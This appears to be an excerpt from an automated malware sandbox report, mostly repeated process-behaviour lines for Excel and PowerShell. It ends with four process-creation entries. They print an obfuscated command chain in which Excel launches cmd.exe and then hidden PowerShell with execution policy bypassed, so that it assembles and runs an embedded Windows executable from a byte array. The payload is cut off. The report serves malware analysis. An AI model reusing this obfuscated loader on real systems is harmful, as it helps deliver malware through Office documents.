Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | Jump to behavior |